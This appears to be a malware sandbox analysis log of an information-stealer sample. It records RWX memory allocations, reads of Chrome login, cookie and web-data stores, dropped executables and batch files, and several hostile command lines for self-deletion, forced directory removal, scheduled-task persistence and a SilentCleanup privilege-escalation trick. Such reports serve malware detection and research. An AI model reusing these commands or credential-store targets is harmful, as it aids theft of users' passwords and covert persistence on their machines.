heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f00000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7777f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2424
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2520
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2520
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7777f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2520
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7777f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2604
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7777f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2708
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7777f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00340000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7777f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1532
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000042f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x712a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x712a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c70000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00da0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00422000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00455000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00457000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00751000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00753000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00446000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00754000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00755000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00756000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00757000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00758000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00759000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0075a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0075b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 3061354
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \\?\Volume{c2d901c4-0706-11e8-912e-806e6f6e6963}\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3059468
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3059468
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3059468
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 12515684352
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Browser\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Cookies
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozMapi32.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy_InUse.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll
file C:\Users\Public\KDECO.bat
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldif60.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\prldap60.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll
file C:\Users\Public\nest.bat
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\dd81b5e9d99588633b73117e3b1f84f1a6952f9d573057d804047a85abfb8328_1609fbf0d6c26e---38596704027.pdf.lnk
file C:\Users\test22\AppData\Local\Temp\E1070B8B\vcruntime140.dll
file C:\ProgramData\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\ds1.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\ac.exe
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\lgpllibs.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\rc.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\ProgramData\vcruntime140.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
file C:\Users\Public\UKO.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click_image.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msi2.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test_doc.eml.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exe1.zip.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test.eml.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\air+france+klm+annual+report+2013-RTMD-AMBb5mCGMAAAvhwCAEtSGQASABszRd8A.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\╗τ┐δ╣².txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok2.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok1.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test (1).eml.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\docx2.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMS Activation.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot2.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_Click.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품).lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시리얼넘버.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroCERT.bmp.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\age.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\password.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\jsGIrPlHsPM.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_History.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시작프로그램.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\doc.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\dd81b5e9d99588633b73117e3b1f84f1a6952f9d573057d804047a85abfb8328_1609fbf0d6c26e---38596704027.pdf.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_Click.py.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\다운로드.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Python27.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msi1.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot3.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\phishing_file.pdf.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msoffice2010_32bit.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\doc2.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMSAuto_Net_2015_v1.4. 2.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품) (2).lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test_zip_doc.eml.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\테스트.txt.lnk
cmdline C:\Windows\System32\cmd.exe /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
cmdline cmd.exe /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline schtasks.exe /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmp824.tmp"
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
cmdline "C:\Windows\System32\cmd.exe" /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
